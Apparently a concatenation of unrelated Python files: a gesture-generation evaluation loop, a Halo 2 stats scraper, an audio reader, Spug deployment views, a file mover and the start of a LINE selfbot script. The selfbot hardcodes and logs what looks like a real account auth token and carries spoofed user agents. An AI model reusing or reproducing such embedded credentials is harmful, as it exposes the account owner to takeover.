extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
word_indices = np.zeros(len(word_seq) + 2)
word_indices[0] = self.lang_model.SOS_token
word_indices[-1] = self.lang_model.EOS_token
frame_duration = (end_time - overall_start_time) / n_frames
print('Subdivision {} of {}. Words: '.format(sub_div_idx + 1, num_subdivisions), end='')
for w_i, word in enumerate(word_seq):
print(word[0], end=', ')
idx = max(0, int(np.floor((word[1] - overall_start_time) / frame_duration)))
extended_word_indices[idx] = self.lang_model.get_word_index(word[0])
word_indices[w_i + 1] = self.lang_model.get_word_index(word[0])
print('\b\b', end='.\n')
in_text_padded = torch.LongTensor(extended_word_indices).unsqueeze(0).to(self.device)
in_text = torch.LongTensor(word_indices).unsqueeze(0).to(self.device)
# prepare target seq and pre seq
if sub_div_idx > 0:
target_seq = torch.zeros_like(out_dir_vec)
start_idx = n_frames * (sub_div_idx - 1)
end_idx = min(n_frames_total, n_frames * sub_div_idx)
target_seq[0, :(end_idx - start_idx)] = torch.from_numpy(
target_dir_vec[start_idx:end_idx]) \
.unsqueeze(0).float().to(self.device)
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
out_dir_vec_trimodal.squeeze(0)[-self.s2eg_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
out_dir_vec.squeeze(0)[-self.s2eg_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
pre_seq_trimodal = pre_seq_trimodal.float().to(self.device)
pre_seq = pre_seq.float().to(self.device)
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq_trimodal,
in_text_padded, in_audio, vid_idx)
out_dir_vec, *_ = self.s2eg_generator(pre_seq, in_text_padded, in_mfcc, vid_idx)
self.evaluator_trimodal, losses_all_trimodal, joint_mae_trimodal, accel_trimodal = \
Processor.push_samples(self.evaluator_trimodal, target_seq, out_dir_vec_trimodal,
in_text, in_audio, losses_all_trimodal, joint_mae_trimodal,
accel_trimodal,
self.s2eg_config_args.mean_dir_vec,
self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
self.evaluator, losses_all, joint_mae, accel = \
Processor.push_samples(self.evaluator, target_seq, out_dir_vec,
in_text, in_audio, losses_all, joint_mae, accel,
self.s2eg_config_args.mean_dir_vec,
self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
out_seq_trimodal = out_dir_vec_trimodal[0, :, :].data.cpu().numpy()
out_seq = out_dir_vec[0, :, :].data.cpu().numpy()
# smoothing motion transition
if len(out_list_trimodal) > 0:
last_poses = out_list_trimodal[-1][-self.s2eg_config_args.n_pre_poses:]
# delete last 4 frames
out_list_trimodal[-1] = out_list_trimodal[-1][:-self.s2eg_config_args.n_pre_poses]
for j in range(len(last_poses)):
n = len(last_poses)
prev_pose = last_poses[j]
next_pose = out_seq_trimodal[j]
out_seq_trimodal[j] = prev_pose * (n - j) / (n + 1) +\
next_pose * (j + 1) / (n + 1)
out_list_trimodal.append(out_seq_trimodal)
if len(out_list) > 0:
last_poses = out_list[-1][-self.s2eg_config_args.n_pre_poses:]
# delete last 4 frames
out_list[-1] = out_list[-1][:-self.s2eg_config_args.n_pre_poses]
for j in range(len(last_poses)):
n = len(last_poses)
prev_pose = last_poses[j]
next_pose = out_seq[j]
out_seq[j] = prev_pose * (n - j) / (n + 1) + next_pose * (j + 1) / (n + 1)
out_list.append(out_seq)
# aggregate results
out_dir_vec_trimodal = np.vstack(out_list_trimodal)
out_dir_vec = np.vstack(out_list)
# fade out to the mean pose
if fade_out:
n_smooth = self.s2eg_config_args.n_pre_poses
start_frame = len(out_dir_vec_trimodal) - \
int(end_padding_duration / data_params['audio_sr']
* self.s2eg_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec_trimodal) < end_frame:
out_dir_vec_trimodal = np.pad(out_dir_vec_trimodal,
[(0, end_frame - len(out_dir_vec_trimodal)), (0, 0)],
mode='constant')
out_dir_vec_trimodal[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
n_smooth = self.s2eg_config_args.n_pre_poses
start_frame = len(out_dir_vec) - \
int(end_padding_duration /
data_params['audio_sr'] * self.s2eg_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec) < end_frame:
out_dir_vec = np.pad(out_dir_vec, [(0, end_frame - len(out_dir_vec)), (0, 0)],
mode='constant')
out_dir_vec[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
# interpolation
y_trimodal = out_dir_vec_trimodal[start_frame:end_frame]
y = out_dir_vec[start_frame:end_frame]
x = np.array(range(0, y.shape[0]))
w = np.ones(len(y))
w[0] = 5
w[-1] = 5
co_effs_trimodal = np.polyfit(x, y_trimodal, 2, w=w)
fit_functions_trimodal = [np.poly1d(co_effs_trimodal[:, k])
for k in range(0, y_trimodal.shape[1])]
interpolated_y_trimodal = [fit_functions_trimodal[k](x)
for k in range(0, y_trimodal.shape[1])]
# (num_frames x dims)
interpolated_y_trimodal = np.transpose(np.asarray(interpolated_y_trimodal))
co_effs = np.polyfit(x, y, 2, w=w)
fit_functions = [np.poly1d(co_effs[:, k]) for k in range(0, y.shape[1])]
interpolated_y = [fit_functions[k](x) for k in range(0, y.shape[1])]
# (num_frames x dims)
interpolated_y = np.transpose(np.asarray(interpolated_y))
out_dir_vec_trimodal[start_frame:end_frame] = interpolated_y_trimodal
out_dir_vec[start_frame:end_frame] = interpolated_y
# make a video
if make_video:
sentence_words = []
for word, _, _ in clip_words:
sentence_words.append(word)
sentence = ' '.join(sentence_words)
filename_prefix = '{}_{}_{}'.format(vid_name, vid_idx, clip_idx)
filename_prefix_for_video = filename_prefix
aux_str = '({}, time: {}-{})'.format(vid_name,
str(datetime.timedelta(seconds=clip_time[0])),
str(datetime.timedelta(seconds=clip_time[1])))
create_video_and_save(
self.args.video_save_path, 0, filename_prefix_for_video, 0, target_dir_vec,
out_dir_vec_trimodal, out_dir_vec, mean_dir_vec, sentence,
audio=clip_audio, aux_str=aux_str, clipping_to_shortest_stream=True,
delete_audio_file=False)
print('Rendered {} of {} videos. Last one took {:.2f} seconds.'.
format(sample_idx + 1, samples_to_generate, time.time() - start_time))
# save pkl
if save_pkl:
out_dir_vec_trimodal = out_dir_vec_trimodal + mean_dir_vec
out_poses_trimodal = convert_dir_vec_to_pose(out_dir_vec_trimodal)
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec_trimodal, 'out_poses': out_poses_trimodal,
'aux_info': '{}_{}_{}'.format(vid_name, vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}_trimodal.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
out_dir_vec = out_dir_vec + mean_dir_vec
out_poses = convert_dir_vec_to_pose(out_dir_vec)
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec, 'out_poses': out_poses,
'aux_info': '{}_{}_{}'.format(vid_name, vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
# print metrics
loss_dict = {'loss': losses_all.avg, 'joint_mae': joint_mae.avg}
elapsed_time = time.time() - start_time
if self.evaluator_trimodal and self.evaluator_trimodal.get_no_of_samples() > 0:
frechet_dist_trimodal, feat_dist_trimodal = self.evaluator_trimodal.get_scores()
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
accel_trimodal.avg,
frechet_dist_trimodal,
feat_dist_trimodal,
elapsed_time))
loss_dict['frechet_trimodal'] = frechet_dist_trimodal
loss_dict['feat_dist_trimodal'] = feat_dist_trimodal
else:
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
elapsed_time))
if self.evaluator and self.evaluator.get_no_of_samples() > 0:
frechet_dist, feat_dist = self.evaluator.get_scores()
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all.avg, joint_mae.avg, accel.avg,
frechet_dist, feat_dist, elapsed_time))
loss_dict['frechet'] = frechet_dist
loss_dict['feat_dist'] = feat_dist
else:
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all.avg,
joint_mae.avg,
elapsed_time))
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - overall_start_time))
|
thread1.py
|
import threading
import time
# Exemplo de função sem parametros
def funcao():
for i in range(3):
print(i, 'Executando a Thread!')
time.sleep(0.5)
print('Iniciando o programa!')
threading.Thread(target=funcao).start() # target sempre recebe o nome da função definida na função. E .start() é para startar a função
print('\nFinalizando...')
|
halo2_after_purge.py
|
import json
import os
import multiprocessing
import threading
import urllib.request
from bs4 import BeautifulSoup
from multiprocessing.pool import ThreadPool
def get_metadata(metadata):
gametype, mapname, playlist, date, time = \
None, None, None, None, None
for line in metadata.text.split('\n'):
line = line.strip()
if line.find(" on ") != -1:
gametype = line[:line.find(" on")]
mapname = line[line.find("n ") + 2:]
elif line.find('-') != -1:
playlist = line[line.find('- ') + 2:]
elif line.find(',') != -1:
date = line[:line.find(',')]
time = line[line.find(',') + 2:]
return gametype, mapname, playlist, date, time
def get_team_data(carnage_rows):
teams = dict()
ranked = dict()
has_teams = False
last_team = None
columns = None
for i in range(len(carnage_rows)):
total_row = []
row = carnage_rows[i]
cols = row.find_all("td")
for col in cols:
text = col.text.strip()
if text == "K/D Spread":
text = "Spread"
total_row.append(text)
exp_bar = col.find("div", {"class": "ExpBar"})
if exp_bar is not None:
# Extract progress to next rank from expbar style attribute
style = exp_bar.find("span").get("style")
progress = style[style.find(':') + 1:style.find("px")]
ranked[total_row[0][:total_row[0].find('\n')]] = str(int(progress) * 2.5)
if i is 0:
columns = total_row
else:
is_team = False
for j in range(len(columns)):
# Identify this column's attribute and add to appropriate target
col_name = columns[j]
item = total_row[j]
player_newline_indent = total_row[0].find('\n')
if col_name == "Players":
# Every name in here is either a team name or a gamertag
if item == "Red Team" or item == "Blue Team" or item == "Green Team" \
or item == "Orange Team" or item == "Brown Team" or item == "Yellow Team" \
or item == "Pink Team":
# All possible team names (If there's an 8th, I haven't found it)
last_team = item
has_teams = True
is_team = True
teams[item] = dict()
teams[item]["players"] = dict()
elif has_teams:
if player_newline_indent != -1:
# Indicates that this was a ranked game
# Player\nRank
player = item[:player_newline_indent]
rank = item[player_newline_indent + 1:]
teams[last_team]["players"][player] = dict()
teams[last_team]["players"][player]["rank"] = rank
teams[last_team]["players"][player]["progress"] = ranked[player]
else:
# Check for guests (not allowed in ranked play)
# All guests are reported as Gamertag(G), even if multiple
# Append number for additional guests (should only be 2, 3, or 4)
if item not in teams[last_team]["players"]:
teams[last_team]["players"][item] = dict()
else:
number = 2
item_copy = item + '(' + str(number) + ')'
while item_copy in teams[last_team]["players"]:
number += 1
item_copy = item + '(' + str(number) + ')'
item = item_copy
total_row[j] = item
teams[last_team]["players"][item] = dict()
else:
# FFA ranked game
if player_newline_indent != -1:
player = item[:player_newline_indent]
rank = item[player_newline_indent + 1:]
teams[player] = dict()
teams[player]["rank"] = rank
teams[player]["progress"] = ranked[player]
else:
teams[item] = dict()
elif has_teams and not is_team:
# Assign attribute to player, located in team dict
if player_newline_indent != -1:
teams[last_team]["players"][total_row[0][:player_newline_indent]][col_name.lower()] = item
else:
teams[last_team]["players"][total_row[0]][col_name.lower()] = item
else:
# Free for all game
if player_newline_indent != -1:
teams[total_row[0][:player_newline_indent]][col_name.lower()] = item
else:
teams[total_row[0]][col_name.lower()] = item
return teams, has_teams
def get_data(game_id):
url = 'http://halo.bungie.net/Stats/GameStatsHalo2.aspx?gameid=' + str(game_id)
page = urllib.request.urlopen(url)
soup = BeautifulSoup(page, "html.parser")
pool = multiprocessing.pool.ThreadPool(2)
output = dict()
output["id"] = str(game_id)
# The carnage tab essentially has all the remaining data
carnage_rows = soup.find("div", {"id": "ctl00_mainContent_bnetpgd_pnlKills"}) \
.find("table", {"class": "stats"}).find_all("tr")
async_team_data = pool.apply_async(get_team_data, [carnage_rows])
# Get information about the map, gametype, playlist, and other metadata
metadata = soup.find("div", {"class": "stats_overview"})\
.find("ul", {"class": "summary"})
async_metadata = pool.apply_async(get_metadata, [metadata])
gametype, mapname, playlist, date, time = async_metadata.get()
output["gametype"] = gametype
output["map"] = mapname
output["playlist"] = playlist
output["date"] = date
output["time"] = time
teams, has_teams = async_team_data.get()
# JSON tag based on if team game or FFA
if has_teams:
output["teams"] = teams
else:
output["players"] = teams
with open("halo_2_game_" + str(game_id) + ".json", 'w') as file:
json.dump(output, file)
stdio_lock = threading.Lock()
def work(start, end):
started = False
for i in range(start, end):
if started:
try:
get_data(i)
except Exception as e:
stdio_lock.acquire()
print(str(os.getpid()) + ": " + str(e))
stdio_lock.release()
continue
elif i not in generated:
if not started:
stdio_lock.acquire()
print(str(os.getpid()) + " starting at " + str(i))
stdio_lock.release()
started = True
try:
get_data(i)
except Exception as e:
stdio_lock.acquire()
print(str(os.getpid()) + ": " + str(e))
stdio_lock.release()
continue
START = 6066
END = 803138050
SUM = END-START
WORK_PER_THREAD = int(SUM / 24)
'''
file_list = os.listdir("E:/Halo 2 Data/")
generated = set()
for file in file_list:
file = file[file.rfind('_')+1:file.find('.')]
generated.add(int(file))
st = START
for i in range(24):
t = multiprocessing.Process(target=work, args=[st, st + WORK_PER_THREAD])
t.start()
st += WORK_PER_THREAD
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is not main_thread:
t.join()
'''
get_data(803000000)
|
audio_reader.py
|
import fnmatch
import os
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
for filename in files:
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename
def load_vctk_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the VCTK dataset, and
additionally the ID of the corresponding speaker.'''
files = find_files(directory)
speaker_re = re.compile(r'p([0-9]+)_([0-9]+)\.wav')
for filename in files:
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
matches = speaker_re.findall(filename)[0]
speaker_id, recording_id = [int(id_) for id_ in matches]
yield audio, speaker_id
def trim_silence(audio, threshold=0.3):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
sample_size=None,
queue_size=256):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def thread_main(self, sess):
buffer_ = np.array([])
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename in iterator:
if self.coord.should_stop():
self.stop_threads()
stop = True
break
# Remove silence
audio = trim_silence(audio[:, 0])
if audio.size == 0:
print("[!] {} was ignored as it only contains silence. \n"
" Consider decreasing trim_silence threshold, or adjust volume "
"of the audio.".format(filename))
if self.sample_size:
# Cut samples into fixed size pieces
buffer_ = np.append(buffer_, audio)
while len(buffer_) > self.sample_size:
piece = np.reshape(buffer_[:self.sample_size], [-1, 1])
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
buffer_ = buffer_[self.sample_size:]
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
def stop_threads():
for t in self.threads:
t.stop()
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
views.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the MIT License.
from django.views.generic import View
from django.db.models import F
from django.conf import settings
from django_redis import get_redis_connection
from libs import json_response, JsonParser, Argument, human_datetime, human_time
from apps.deploy.models import DeployRequest
from apps.app.models import Deploy
from apps.deploy.utils import deploy_dispatch
from apps.host.models import Host
from threading import Thread
from datetime import datetime
import json
import uuid
class RequestView(View):
def get(self, request):
data, query = [], {}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
for item in DeployRequest.objects.filter(**query).annotate(
env_id=F('deploy__env_id'),
env_name=F('deploy__env__name'),
app_id=F('deploy__app_id'),
app_name=F('deploy__app__name'),
app_host_ids=F('deploy__host_ids'),
app_extend=F('deploy__extend'),
created_by_user=F('created_by__nickname')):
tmp = item.to_dict()
tmp['env_id'] = item.env_id
tmp['env_name'] = item.env_name
tmp['app_id'] = item.app_id
tmp['app_name'] = item.app_name
tmp['app_extend'] = item.app_extend
tmp['extra'] = json.loads(item.extra)
tmp['host_ids'] = json.loads(item.host_ids)
tmp['app_host_ids'] = json.loads(item.app_host_ids)
tmp['status_alias'] = item.get_status_display()
tmp['created_by_user'] = item.created_by_user
data.append(tmp)
return json_response(data)
def post(self, request):
form, error = JsonParser(
Argument('id', type=int, required=False),
Argument('deploy_id', type=int, help='缺少必要参数'),
Argument('name', help='请输申请标题'),
Argument('extra', type=list, help='缺少必要参数'),
Argument('host_ids', type=list, filter=lambda x: len(x), help='请选择要部署的主机'),
Argument('desc', required=False),
).parse(request.body)
if error is None:
deploy = Deploy.objects.filter(pk=form.deploy_id).first()
if not deploy:
return json_response(error='未找到该发布配置')
form.status = '0' if deploy.is_audit else '1'
form.extra = json.dumps(form.extra)
form.host_ids = json.dumps(form.host_ids)
if form.id:
DeployRequest.objects.filter(pk=form.id).update(
created_by=request.user,
reason=None,
**form
)
else:
DeployRequest.objects.create(created_by=request.user, **form)
return json_response(error=error)
def put(self, request):
form, error = JsonParser(
Argument('id', type=int, help='缺少必要参数'),
Argument('action', filter=lambda x: x in ('check', 'do'), help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=form.id).first()
if not req:
return json_response(error='未找到指定发布申请')
pre_req = DeployRequest.objects.filter(
deploy_id=req.deploy_id,
type='1',
id__lt=req.id,
version__isnull=False).first()
if not pre_req:
return json_response(error='未找到该应用可以用于回滚的版本')
if form.action == 'check':
return json_response({'date': pre_req.created_at, 'name': pre_req.name})
DeployRequest.objects.create(
deploy_id=req.deploy_id,
name=f'{req.name} - 回滚',
type='2',
extra=pre_req.extra,
host_ids=req.host_ids,
status='0' if pre_req.deploy.is_audit else '1',
desc='自动回滚至该应用的上个版本',
version=pre_req.version,
created_by=request.user
)
return json_response(error=error)
def delete(self, request):
form, error = JsonParser(
Argument('id', type=int, help='缺少必要参数')
).parse(request.GET)
if error is None:
DeployRequest.objects.filter(pk=form.id, status__in=('0', '1', '-1')).delete()
return json_response(error=error)
class RequestDetailView(View):
def get(self, request, r_id):
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定发布申请')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
targets = [{'id': x.id, 'title': f'{x.name}({x.hostname}:{x.port})'} for x in hosts]
server_actions, host_actions, outputs = [], [], []
if req.deploy.extend == '2':
server_actions = json.loads(req.deploy.extend_obj.server_actions)
host_actions = json.loads(req.deploy.extend_obj.host_actions)
if request.GET.get('log'):
rds, key, counter = get_redis_connection(), f'{settings.REQUEST_KEY}:{r_id}', 0
data = rds.lrange(key, counter, counter + 9)
while data:
counter += 10
outputs.extend(x.decode() for x in data)
data = rds.lrange(key, counter, counter + 9)
return json_response({
'app_name': req.deploy.app.name,
'env_name': req.deploy.env.name,
'status': req.status,
'type': req.type,
'status_alias': req.get_status_display(),
'targets': targets,
'server_actions': server_actions,
'host_actions': host_actions,
'outputs': outputs
})
def post(self, request, r_id):
query = {'pk': r_id}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
req = DeployRequest.objects.filter(**query).first()
if not req:
return json_response(error='未找到指定发布申请')
if req.status not in ('1', '-3'):
return json_response(error='该申请单当前状态还不能执行发布')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
token = uuid.uuid4().hex
outputs = {str(x.id): {'data': ''} for x in hosts}
outputs.update(local={'data': f'{human_time()} 建立接连... '})
req.status = '2'
if not req.version:
req.version = f'{req.deploy_id}_{req.id}_{datetime.now().strftime("%Y%m%d%H%M%S")}'
req.save()
Thread(target=deploy_dispatch, args=(request, req, token)).start()
return json_response({'token': token, 'type': req.type, 'outputs': outputs})
def patch(self, request, r_id):
form, error = JsonParser(
Argument('reason', required=False),
Argument('is_pass', type=bool, help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定申请')
if not form.is_pass and not form.reason:
return json_response(error='请输入驳回原因')
if req.status != '0':
return json_response(error='该申请当前状态不允许审核')
req.approve_at = human_datetime()
req.approve_by = request.user
req.status = '1' if form.is_pass else '-1'
req.reason = form.reason
req.save()
return json_response(error=error)
|
manager.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:set ts=4 sw=4 et:
# Copyright 2018-2019 Artem Smirnov
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os.path
import time
from threading import Thread
from queue import Queue
from fnmatch import fnmatch
from json_array import JsonArray
from smart_buffer import SmartBuffer
from mover import Mover
from logger import get_logger
from gui import QtWidgets, MainWindowApp
from main_logic import *
def main():
if len(sys.argv) != 2:
print("Error 4. Doesn't have path to the config-file as argument")
exit(1)
else:
config_path = sys.argv[1]
worker_data = {}
if os.path.exists(os.path.dirname(config_path)):
try:
import json
with open(config_path, 'r') as infile:
worker_data = json.load(infile)
except IOError as ex:
if ex.errno == 2:
print("Error 1. The config file doesn't exist")
exit(1)
except ValueError as ex:
print("Error 2. Incorrect Json in the config file: " + str(ex))
exit(1)
else:
print("Error 3. The config file doesn't exist")
exit(1)
if worker_data["gui"]:
# больше одного worker как отдельного процесса вроде как не запустить!
# https://pythonworld.ru/osnovy/instrukciya-if-elif-else-proverka-istinnosti-trexmestnoe-vyrazhenie-ifelse.html
# A = Y if X else Z
app = QtWidgets.QApplication(sys.argv) # Новый экземпляр QApplication
global window
window = MainWindowApp() # Создаём объект класса ExampleApp
window.show() # Показываем окно
# create_threads(1, finder, db, source, target, worker_data["finder"]["search_interval"], worker_data["finder"]["mkdir_interval"], wq, worker_data["rules"]["include"], worker_data["rules"]["exclude"], worker_data["db"]["key"], worker_data["db"]["default_record"], logger)
# create_threads(worker_data["mover_count"], mover, target, source, wq, logger)
app.exec_() # и запускаем приложение
return 0
else:
if worker_data["enable"]:
logger = get_logger(worker_data["name"], worker_data["logger"]["log_level"], worker_data["logger"]["console_output"], worker_data["logger"]["log_path"])
db = JsonArray(worker_data["db_backup"]["db_path"], worker_data["db_backup"]["autosave_interval"], logger)
wq = Queue()
for record in db:
if not record['downloaded'] or not record['uploaded'] or not record['dropped']: wq.put(record)
m1 = __import__(worker_data["source"]["device"])
worker_data["source"]["args"]["logger"] = logger
source = getattr(m1, worker_data["source"]["device"])(**worker_data["source"]["args"])
m2 = __import__(worker_data["target"]["device"])
worker_data["target"]["args"]["logger"] = logger
target = getattr(m2, worker_data["target"]["device"])(**worker_data["target"]["args"])
def create_threads(count, function, *args):
for i in range(count):
t = Thread(target=function, args=(i+1, args,))
t.daemon = True
t.start()
window = None
create_threads(1, finder, window, db, source, target, worker_data["finder"]["search_interval"], worker_data["finder"]["mkdir_interval"], wq, worker_data["rules"]["include"], worker_data["rules"]["exclude"], worker_data["db"]["key"], worker_data["db"]["default_record"], logger)
create_threads(worker_data["mover_count"], mover, window, target, source, wq, logger)
try:
while True:
time.sleep(10)
except KeyboardInterrupt:
# del db
# smart_buffer.dump()
return 0
if __name__ == '__main__':
main()
|
sb.py
|
# -*- coding: utf-8 -*-
from linepy import *
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from gtts import gTTS
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib3, urllib, urllib.parse
from threading import Thread
from googletrans import Translator
#==============================================================================#
mulai = time.time()
line = LINE("EAmGeOOCWFuYq5gH8bS1.oFAdwbsxdvvicAIEyG/cGq.4CcoqqWUTLPAhrpniUfLNwiXEBCx0QFGxaM8rze5Gos=")
line.log("Auth Token : " + str(line.authToken))
line.log("Timeline Token : " + str(line.tl.channelAccessToken))
print ("Login succes ")
lineMID = line.profile.mid
lineProfile = line.getProfile()
lineSettings = line.getSettings()
oepoll = OEPoll(line)
welcome = []
responPc = []
autoRespon = []
autoResponImage = []
autoResponPm = []
msg_dict1 = {}
msg_dict = {}
#==============================================================================#
settings = {
"autoAdd": False,
"autoJoin": False,
"contact":False,
"autoblock": False,
"autoRespon": False,
"autoKick": False,
"diinvite": " terima kasih sudah invite saya",
"autoResponImage": False,
"autoResponPm": False,
"simiSimi": {},
"autoLeave": False,
"autojj": False,
"leavemsg": False,
"welcomemsg": False,
"responPc": False,
"keluar":"sᴇʟᴀᴍᴀᴛ ᴊᴀʟᴀɴ ....\nsᴇᴍᴏɢᴀ ᴋᴀᴍᴜ ʙᴀɪᴋ2 ᴅɪʟᴜᴀʀ sᴀɴᴀ\nsᴀᴍᴘᴀɪ ᴊᴜᴍᴘᴀ 👌👌👌",
"autoRead": False,
"protect": False,
"qrprotect": False,
"tag": "Iya, ada apa ka",
"tag2": "Ada apa kak tag saya",
"tag3": "Ada apasih ka Pm mulu",
"detectMention": False,
"autorejc": False,
"mention": "Sider mulu sini ka",
"welcome":"sᴇᴍᴏɢᴀ ʙᴇᴛᴀʜ ʏᴀ...\nsᴀʟᴀᴍ ᴋᴇɴᴀʟ ᴅᴀʀɪ sᴀʏᴀ 😘",
"responpc": "Tag terus",
"checkSticker": False,
"TagMention": False,
"TagMention2": False,
"unsendMessage":False,
"autoBalas": False,
'wellcome':False,
'bymsg':{},
"lang":"JP",
"autoJoinTicket": {},
"changeGroupPicture":True,
"Mute": True,
"changePicture": {},
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
